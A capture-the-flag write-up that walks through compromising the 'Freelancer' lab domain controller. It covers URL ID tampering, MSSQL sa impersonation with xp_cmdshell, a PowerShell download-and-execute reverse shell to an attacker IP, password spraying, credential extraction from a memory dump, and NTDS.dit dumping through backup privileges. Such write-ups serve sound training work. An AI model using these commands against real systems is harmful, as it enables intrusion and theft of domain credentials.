Week 7. Freelancer

TL;DR

This is a Windows Server 2019 machine acting as a domain controller and hosting a job search web site. User IDs are Base64 encoded in the URLs, so we can just sign up an account and escalate to web administrator just manipulating the URL. Once in the administrator dashboard, we use a MSSQL console to escalate to sa user and enable xp_cmdshell commands, that we use to get a reverse shell and collect the user flag.

Regarding escalation, first we find a memory dump in the file system from where, once opened with a forensics tool, we can extract several hashes. One of the hashes can be cracked and enables a lateral movement to another user with permissions to restore AD objects from the recycle bin. We recover a deleted AD user account that in turn has SeBackupPrivilege enabled. We abuse this to backup SAM, SYSTEM and NTDS.dit files, from where we can extract domain administrator hash.

KEYWORDS

MSSQL escalation, xp_cmdshell, MemProcFS, Pypykatz, AD recycle bin, SeBackupPrivilege, Impacket, changepassword.py, SAM, SYSTEM, NTDS.dit, secretsdump.py.

REFERENCES

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#impersonation-of-other-users

https://github.com/martinsohn/PowerShell-reverse-shell/blob/main/powershell-reverse-shell.ps1

https://github.com/ufrisk/MemProcFS

https://github.com/skelsec/pypykatz

https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#ad-recycle-bin

https://learn.microsoft.com/en-us/powershell/module/activedirectory/restore-adobject?view=windowsserver2022-ps

https://medium.com/r3d-buck3t/windows-privesc-with-sebackupprivilege-65d2cd1eb960#ac58

ENUMERATION

Port scan.

> for ports in $(nmap $target -p- --min-rate=5000 -Pn --open --reason | grep open | awk -F "/" '{print $1}' | tr '\n' ',' | sed s/,$//); do nmap $target -p$ports -sV -sC -Pn -vv -n && echo "\nList of open ports: $ports";done

Starting Nmap 7.93 ( https://nmap.org ) at 2025-01-11 22:23 GMT
Nmap scan report for 10.10.11.5
Host is up, received user-set (0.058s latency).
Scanned at 2025-01-11 22:23:42 GMT for 72s
PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
80/tcp    open  http          syn-ack nginx 1.25.5
|_http-title: Did not follow redirect to http://freelancer.htb/
|_http-server-header: nginx/1.25.5
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-01-12 03:26:28Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49670/tcp open  msrpc         syn-ack Microsoft Windows RPC
49676/tcp open  msrpc         syn-ack Microsoft Windows RPC
49677/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49680/tcp open  msrpc         syn-ack Microsoft Windows RPC
49685/tcp open  msrpc         syn-ack Microsoft Windows RPC
55297/tcp open  ms-sql-s      syn-ack Microsoft SQL Server 2019
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2025-01-12T03:27:35+00:00; +5h02m41s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-01-12T02:16:21
| Not valid after:  2055-01-12T02:16:21
| MD5:   1401da9f484054bc111cb6a5d6e013ac
| SHA-1: 318ef71538f6995e5c8bb0328bfdc6cde5756adc
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQNzt1neEllblK3ydUOq7puDANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjUwMTEyMDIxNjIxWhgPMjA1NTAxMTIwMjE2MjFaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBANGhH1In
| I3yFpTxbXHlrV3gF6kjrbO1kgIAju3yUcwVpSWZjJxoCx0K97Vlquydh3ETEokU0
| E1zd2MLJ6C3EhidMJMfP3zlIL8yke72F8Cs2/o7lwo2NPU/eGRcpiAUbgapLspNy
| YSQvKc/J6+s2RuZCO0hklyD8POBhb1F5cdvRMV00oP6MvJz/kG8eqGuQJzjr0Eog
| rO82Pkv1nscnyaTjMCA1vJcY3klStjV9lU5Ee9ZJBBQ4b6m74Iisp8Rq9eGGW37t
| Fxj6EF1+jmaiyJgDHq8Mvu16LRTfCpbNWNS/MesDhBtyUmxqlgmBbVlDVPYgpVCF
| EClNLAAf3ilRfukCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAYeESeCIkIt5oLshq
| PpAngg42DB7V7jYxqznbndNDAMAgXq2BxpUXgW5oig2SqbHpFJ7WEJvcFx5m0ahe
| bHOI4bMY645p0Coq6dsZLDUTvWd7sQxOtn9UGMo3zPV3Ubv3gvc7BrT+X1/A+EN8
| T3P8WQ98mJxHa4K87rzyT6O5j838ANH/TEBGd1PSAlRzJV56gPRPEyvzFpcvS+sI
| GGFwRKxCe0KrsvN7mtyWFZb4mgfGo1nXQ9yVBAxGzeH22HlWaXwNV573Iy7WdB92
| evpUsfzjztr4OZaua8qMynVKD0EtCQDjtIOisrizcAB9E0vEMHWN5z7SZci3hp7/
| JuvXXg==
|_-----END CERTIFICATE-----
63189/tcp open  msrpc         syn-ack Microsoft Windows RPC
63193/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
|_clock-skew: mean: 5h02m40s, deviation: 0s, median: 5h02m39s
| smb2-time:
|   date: 2025-01-12T03:27:26
|_  start_date: N/A
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 44972/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 53827/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 55524/udp): CLEAN (Failed to receive data)
|   Check 4 (port 39397/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
 
Nmap done: 1 IP address (1 host up) scanned in 72.88 seconds
 
List of open ports: 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49670,49676,49677,49680,49685,55297,63189,63193

Looks like a domain controller, add to hosts file and enumerate the web site with Firefox. A job search comes into view, where you can register a new employer account.

Fuzz for hidden content.

> ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 20 -fc 404 -e .php,.html,.txt,.md -u http://freelancer.htb/FUZZ
 
        /'___\  /'___\           /'___\      
       /\ \__/ /\ \__/  __  __  /\ \__/      
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\     
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/     
         \ \_\   \ \_\  \ \____/  \ \_\      
          \/_/    \/_/   \/___/    \/_/      
 
       v2.1.0-dev
________________________________________________
 
 :: Method           : GET
 :: URL              : http://freelancer.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
 :: Extensions       : .php .html .txt .md
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 20
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 404
________________________________________________
 
about                   [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 389ms]
admin                   [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 399ms]
blog                    [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 394ms]
contact                 [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 336ms]
:: Progress: [23565/23565] :: Job [1/1] :: 51 req/sec :: Duration: [0:07:55] :: Errors: 0 ::

There is and /admin path for which we still do not have access.

USER

When you try to log in with your created new account it says the "Account is not activated and cannot be authenticated". To bypass this just fill in a "Forgot password" form and reset your password, you'll need your personal answers.

Reset the password and access your user dashboard, then click on "QR-Code".

Scan your QR code and inspect the URL.

It should be something like this: http://freelancer.htb/accounts/login/otp/MTAwMTA=/7e043d891429e7366518e939c521364d

Decode the Base64 part, it returns a 5-digit number.

> echo 'MTAwMTA=' | base64 -d
10010

This looks like an user ID; also, in the blog we can find several IDs of users we could impersonate.

For example, this user has ID=10.

To impersonate him, just encode the ID=10 in Base64.

> echo '10' | base64
MTAK

Then forge a URL similar to the previous one. Just substitute the Base64 part with the new code: http://freelancer.htb/accounts/login/otp/MTAK/7e043d891429e7366518e939c521364d

Enter the URL and you are in the user's dashboard.

We can try several other IDs, till you find out ID=2 is the admin account. Base64 for "2" is "Mgo=".

Enter URL: http://freelancer.htb/accounts/login/otp/Mgo=/7e043d891429e7366518e939c521364d and you are in the admin dashboard.

Now we can access to the /admin path we found with ffuf before. Here we find an admin dashboard where we can issue MSSQL statements.

Let's try enabling code execution.

> execute enable_xp_cmdshell;
('42000', "[42000] [Microsoft][ODBC Driver 17 for SQL Server][SQL Server]Could not find stored procedure 'enable_xp_cmdshell'. (2812) (SQLExecDirectW)")

> execute xp_cmdshell 'systeminfo';
('42000', "[42000] [Microsoft][ODBC Driver 17 for SQL Server][SQL Server]The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'. (229) (SQLExecDirectW)")

No luck, let's try to enable xp_cmdshell manually.

> execute sp_configure 'show advanced options', '1';
RECONFIGURE

> execute sp_configure 'xp_cmdshell', '1';
RECONFIGURE

> execute xp_cmdshell "systeminfo";
('42000', '[42000] [Microsoft][ODBC Driver 17 for SQL Server][SQL Server]User does not have permission to perform this action. (15247) (SQLExecDirectW)')

The application returns a permissions error, so it seems we will need to escalate privileges in MSSQL.

Check if we can impersonate user sa

SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE';

It seems we can. Now we abuse this to add ourselves to the sysadmin group, for which we need first to know our current username.

> select user_name();
Freelancer_webapp_user

Add ourselves to the sysadmin group.

> execute as login = 'sa'
exec sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'
No results. Previous SQL was not a query.

The query returns "No results", but is executed successfully.

Now we can enable command execution and test if we can issue commands.

> execute sp_configure 'show advanced options', '1';
RECONFIGURE

> execute sp_configure 'xp_cmdshell', '1';
RECONFIGURE
No results. Previous SQL was not a query.

> execute xp_cmdshell "systeminfo";
output
null
Host Name: DC
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA664
Original Install Date: 5/28/2024, 10:25:02 AM
System Boot Time: 8/31/2024, 5:33:49 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2595 Mhz
[02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2595 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,294 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 2,952 MB
Virtual Memory: In Use: 1,847 MB
Page File Location(s): C:\pagefile.sys
Domain: freelancer.htb
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.11.5
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
null

Seems it works, next step is to send a Powershell reverse shell.

> execute sp_configure 'show advanced options', '1';
RECONFIGURE

> execute sp_configure 'xp_cmdshell', '1';
RECONFIGURE

> exec xp_cmdshell 'powershell -c "IEX (iwr -usebasicparsing http://10.10.14.104/shell.ps1)"'

Once inside, make bit of enumeration. In C:\users we see several usernames.

> dir
 
 
    Directory: C:\users
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        8/31/2024   5:34 PM                Administrator
d-----        5/28/2024  10:23 AM                lkazanof
d-----        5/28/2024  10:23 AM                lorra199
d-----        5/28/2024  10:22 AM                mikasaAckerman
d-----        8/27/2023   1:16 AM                MSSQLSERVER
d-r---        5/28/2024   2:13 PM                Public
d-----        5/28/2024  10:22 AM                sqlbackupoperator
d-----        8/31/2024   5:35 PM                sql_svc

And in C:\users\sql_svc\downloads\sqlexpr-2019_x64_enu there is the configuration file sql-configuration.ini

dir
 
    Directory: C:\users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        5/27/2024   1:52 PM                1033_ENU_LP
d-----        5/27/2024   1:52 PM                redist
d-----        5/27/2024   1:52 PM                resources
d-----        5/27/2024   1:52 PM                x64
-a----        9/24/2019   9:00 PM             45 AUTORUN.INF
-a----        9/24/2019   9:00 PM            784 MEDIAINFO.XML
-a----        9/29/2023   4:49 AM             16 PackageId.dat
-a----        9/24/2019   9:00 PM         142944 SETUP.EXE
-a----        9/24/2019   9:00 PM            486 SETUP.EXE.CONFIG
-a----        5/27/2024   4:58 PM            724 sql-Configuration.INI
-a----        9/24/2019   9:00 PM         249448 SQLSETUPBOOTSTRAPPER.DLL

That contains password IL0v3ErenY3ager

Let's spray this password all over the user list.

> crackmapexec winrm freelancer.htb -u ./userlist -p 'IL0v3ErenY3ager' --continue-on-success
WINRM       10.10.11.5      5985   DC               [*] Windows 10.0 Build 17763 (name:DC) (domain:freelancer.htb)
WINRM       10.10.11.5      5985   DC               [*] http://10.10.11.5:5985/wsman
WINRM       10.10.11.5      5985   DC               [-] freelancer.htb\Administrator:IL0v3ErenY3ager "unsupported hash type md4"
WINRM       10.10.11.5      5985   DC               [-] freelancer.htb\lkazanof:IL0v3ErenY3ager "unsupported hash type md4"
WINRM       10.10.11.5      5985   DC               [-] freelancer.htb\lorra199:IL0v3ErenY3ager "unsupported hash type md4"
WINRM       10.10.11.5      5985   DC               [-] freelancer.htb\mikasaAckerman:IL0v3ErenY3ager "unsupported hash type md4"
WINRM       10.10.11.5      5985   DC               [-] freelancer.htb\MSSQLSERVER:IL0v3ErenY3ager "unsupported hash type md4"
WINRM       10.10.11.5      5985   DC               [-] freelancer.htb\sqlbackupoperator:IL0v3ErenY3ager "unsupported hash type md4"
WINRM       10.10.11.5      5985   DC               [-] freelancer.htb\sql_svc:IL0v3ErenY3ager "unsupported hash type md4"
 
> crackmapexec smb freelancer.htb -u ./userlist -p 'IL0v3ErenY3ager' --continue-on-success
SMB         10.10.11.5      445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:freelancer.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.5      445    DC               [-] freelancer.htb\Administrator:IL0v3ErenY3ager STATUS_LOGON_FAILURE
SMB         10.10.11.5      445    DC               [-] freelancer.htb\lkazanof:IL0v3ErenY3ager STATUS_LOGON_FAILURE
SMB         10.10.11.5      445    DC               [-] freelancer.htb\lorra199:IL0v3ErenY3ager STATUS_LOGON_FAILURE
SMB         10.10.11.5      445    DC               [+] freelancer.htb\mikasaAckerman:IL0v3ErenY3ager
SMB         10.10.11.5      445    DC               [-] freelancer.htb\MSSQLSERVER:IL0v3ErenY3ager STATUS_LOGON_FAILURE
SMB         10.10.11.5      445    DC               [-] freelancer.htb\sqlbackupoperator:IL0v3ErenY3ager STATUS_LOGON_FAILURE
SMB         10.10.11.5      445    DC               [-] freelancer.htb\sql_svc:IL0v3ErenY3ager STATUS_LOGON_FAILURE

Nothing is found in the SMB share.

> smbmap -H freelancer.htb -u mikasaAckerman -p 'IL0v3ErenY3ager'
[+] IP: freelancer.htb:445      Name: unknown                                           
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        SYSVOL                                                  READ ONLY       Logon server share

But we can use credentials to move laterally to user mikasaackerman with runascs.exe

> .\runascs.exe mikasaAckerman IL0v3ErenY3ager cmd.exe -r 10.10.14.104:9000

And from here collect the user flag.

SYSTEM

Begin from the mikasaackerman shell and take the opportunity to enumerate the system.

> systeminfo
 
Host Name:                 DC
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
System Type:               x64-based PC

In the desktop there is a text file. It says someone has created a memory dump for troubleshooting purposes.

Hello Mikasa,
I tried once again to work with Liza Kazanoff after seeking her help to
troubleshoot the BSOD issue on the "DATACENTER-2019" computer. As you know, the
problem started occurring after we installed the new update of SQL Server 2019.
I attempted the solutions you provided in your last email, but unfortunately,
there was no improvement. Whenever we try to establish a remote SQL connection to
the installed instance, the server's CPU starts overheating, and the RAM usage
keeps increasing until the BSOD appears, forcing the server to restart.
Nevertheless, Liza has requested me to generate a full memory dump on the
Datacenter and send it to you for further assistance in troubleshooting the
issue.
Best regards,

Bring the dump to your Kali machine and extract the DMP file. Open it with MemProcFS forensics tool.

> sudo ./memprocfs -device ../MEMORY.DMP -mount /mnt/memdump -forensic 0
Initialized 64-bit Windows 10.0.17763
============================== MemProcFS ==============================
- Author: Ulf Frisk - pcileech@frizk.net
- Info: https://github.com/ufrisk/MemProcFS
- Discord: https://discord.gg/pcileech
- License: GNU Affero General Public License v3.0
---------------------------------------------------------------------
MemProcFS is free open source software. If you find it useful please
become a sponsor at: https://github.com/sponsors/ufrisk Thank You :)
---------------------------------------------------------------------
- Version: 5.9.14 (Linux)
- Mount Point: /mnt/memprocfs
- Tag: 17763_a3431de6
- Operating System: Windows 10.0.17763 (X64)
==========================================================================

In the /mnt/memdump/py/regsecrets directory there is a file called regsecrets-install.txt. It contains instructions to install the regsecrets plugin. Apart from this plugin, also Pypypkatz package is needed, so it may be needed to install it with pip3.

After installing both things, run again the memprocfs command and navigate again to the /mnt/memdump/py/regsecrets directory. This time the tool is able to extract secrets from the dump and copy them to TXT files.

FREELANCER.HTB/Administrator:*2023-10-04
12:55:34*$DCC2$10240#Administrator#67a0c0f193abd932b55fb8916692c361
FREELANCER.HTB/lorra199:*2023-10-04
12:29:00*$DCC2$10240#lorra199#7ce808b78e75a5747135cf53dc6ac3b1
FREELANCER.HTB/liza.kazanof:*2023-10-04
17:31:23*$DCC2$10240#liza.kazanof#ecd6e532224ccad2abcf2369ccb8b679
...
=== LSA Service User Secret ===
History: False
Service name: _SC_MSSQL$DATA
Username: UNKNOWN
00000000: 50 57 4e 33 44 23 6c 30 72 72 40 41 72 6d 65 73 |PWN3D#l0rr@Armes|
00000010: 73 61 31 39 39 |sa199|

The DCC2 hashes are cached domain credentials, one of them can be cracked with module 2100. Save the password as it will be needed later.

On the other hand, the extracted LSA secret turns to be valid for a WinRM session as lorra199

Start by enumerating lorra199 permissions and groups.

> whoami /priv
 
PRIVILEGES INFORMATION
----------------------
 
Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
 
> whoami /groups
 
GROUP INFORMATION
-----------------
 
Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
FREELANCER\AD Recycle Bin                  Group            S-1-5-21-3542429192-2036945976-3483670807-1164 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

There is a group called FREELANCER\AD Recycle Bin. It seems members of this group can read or deleted active directory objects.

To abuse this privileged group, first we enumerate the deleted objects currently being stored in the recycle bin.

> Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties sAMAccountName
 
 
Deleted           : True
DistinguishedName : CN=Deleted Objects,DC=freelancer,DC=htb
Name              : Deleted Objects
ObjectClass       : container
ObjectGUID        : bb081f2b-bd0a-4fc7-b3e9-50e107e961ee
 
Deleted           : True
DistinguishedName : CN=Emily Johnson\0ADEL:0c78ea5f-c198-48da-b5fa-b8554a02f3b6,CN=Deleted Objects,DC=freelancer,DC=htb
Name              : Emily Johnson
                    DEL:0c78ea5f-c198-48da-b5fa-b8554a02f3b6
ObjectClass       : user
ObjectGUID        : 0c78ea5f-c198-48da-b5fa-b8554a02f3b6
sAMAccountName    : ejohnson
 
Deleted           : True
DistinguishedName : CN=James Moore\0ADEL:8194e0a3-b636-4dba-91de-317dfe34f5b5,CN=Deleted Objects,DC=freelancer,DC=htb
Name              : James Moore
                    DEL:8194e0a3-b636-4dba-91de-317dfe34f5b5
ObjectClass       : user
ObjectGUID        : 8194e0a3-b636-4dba-91de-317dfe34f5b5
sAMAccountName    : jmoore
 
Deleted           : True
DistinguishedName : CN=Abigail Morris\0ADEL:80104541-085f-4686-b0a2-26a0cbd7c23c,CN=Deleted Objects,DC=freelancer,DC=htb
Name              : Abigail Morris
                    DEL:80104541-085f-4686-b0a2-26a0cbd7c23c
ObjectClass       : user
ObjectGUID        : 80104541-085f-4686-b0a2-26a0cbd7c23c
sAMAccountName    : abigail.morris
 
Deleted           : True
DistinguishedName : CN=Noah Baker\0ADEL:d955e3c2-6ff5-4b66-8971-2caa60ea72c7,CN=Deleted Objects,DC=freelancer,DC=htb
Name              : Noah Baker
                    DEL:d955e3c2-6ff5-4b66-8971-2caa60ea72c7
ObjectClass       : user
ObjectGUID        : d955e3c2-6ff5-4b66-8971-2caa60ea72c7
sAMAccountName    : noah.baker
 
Deleted           : True
DistinguishedName : CN=tony stark\0ADEL:e7027ba5-1921-488f-b4d8-58d7dac4aca9,CN=Deleted Objects,DC=freelancer,DC=htb
Name              : tony stark
                    DEL:e7027ba5-1921-488f-b4d8-58d7dac4aca9
ObjectClass       : user
ObjectGUID        : e7027ba5-1921-488f-b4d8-58d7dac4aca9
sAMAccountName    : sstark
 
Deleted           : True
DistinguishedName : CN=Liza Kazanof\0ADEL:ebe15df5-e265-45ec-b7fc-359877217138,CN=Deleted Objects,DC=freelancer,DC=htb
Name              : Liza Kazanof
                    DEL:ebe15df5-e265-45ec-b7fc-359877217138
ObjectClass       : user
ObjectGUID        : ebe15df5-e265-45ec-b7fc-359877217138
sAMAccountName    : liza.kazanof

Notice for one of the deleted objects (liza.kazanof) we have already cracked the pass. So we will restore this user from the recycle bin and have a WinRM shell as her.

First we need the ObjectGUID of the deleted account.

> Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties objectGUID
 
Deleted           : True
DistinguishedName : CN=Liza Kazanof\0ADEL:ebe15df5-e265-45ec-b7fc-359877217138,CN=Deleted Objects,DC=freelancer,DC=htb
Name              : Liza Kazanof
                    DEL:ebe15df5-e265-45ec-b7fc-359877217138
ObjectClass       : user
ObjectGUID        : ebe15df5-e265-45ec-b7fc-359877217138

And now we can restore the user in the AD.

> restore-ADObject -identity 'ebe15df5-e265-45ec-b7fc-359877217138' -newname "liza.kazanof"

However, if we try to connect with evil-winrm we receive an authentication error. This can be explained with crackmapexec: the password is expired.

> crackmapexec smb freelancer.htb -u liza.kazanof -p 'RockYou!'
SMB         10.10.11.5      445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:freelancer.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.5      445    DC               [-] freelancer.htb\liza.kazanof:RockYou! STATUS_PASSWORD_EXPIRED

Use Impacket's changepasswd.py to update the password.

> python3 /usr/share/doc/python3-impacket/examples/changepasswd.py freelancer.htb/liza.kazanof:'RockYou!'@freelancer.htb -newpass 'Password123!'

Now it is possible to have a shell as liza.kazanof

> evil-winrm -u liza.kazanof -p 'Password123!' -i freelancer.htb

Enumerating her permissions, we see she has SeBackupPrivilege and SeRestorePrivilege. This means she has complete access to the file system, even SAM and SYSTEM registry hives and the Active Directory database, that is stored in the file NTDS.dit in domain controllers.

> whoami /priv
 
PRIVILEGES INFORMATION
----------------------
 
Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

We will abuse this with Diskshadow and Robocopy.

In the liza.kazanoff shell, create an script file for Diskshadow.

> echo "set verbose on" > script.dsh;echo "set metadata C:\Windows\Temp\meta.cab" >> script.dsh;echo "set context clientaccessible" >> script.dsh;echo "set context persistent" >> script.dsh;echo "begin backup" >> script.dsh;echo "add volume C: alias cdrive" >> script.dsh;echo "create" >> script.dsh;echo "expose %cdrive% F:" >> script.dsh;echo "end backup" >> script.dsh;echo "exit" >> script.dsh;type script.dsh

Then convert to ASCII, otherwise Diskshadow will not be able to read it.

> (Get-Content -Path "script.dsh") | Out-File -FilePath "script_ascii.dsh" -Encoding ascii

Now we can run the tool passing the ASCII script as an argument.

> diskshadow /s script_ascii.dsh

Then copy the NTDS.dit file with Robocopy to the temporal file created in the C: drive.

> robocopy /B F:\Windows\NTDS .\ntds ntds.dit

Now extract the SAM and SYSTEM hives.

> reg save hklm\system system;
The operation completed successfully.
 
> reg save hklm\sam sam
The operation completed successfully.

Transfer the three files to your Kali machine, then process them and extract all the domain hashes with Impacket's secretsdump.py

> python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam ./sam -system ./system -ntds ./ntds.dit local

And with the domain administrator hash you can read the flag.

You are root.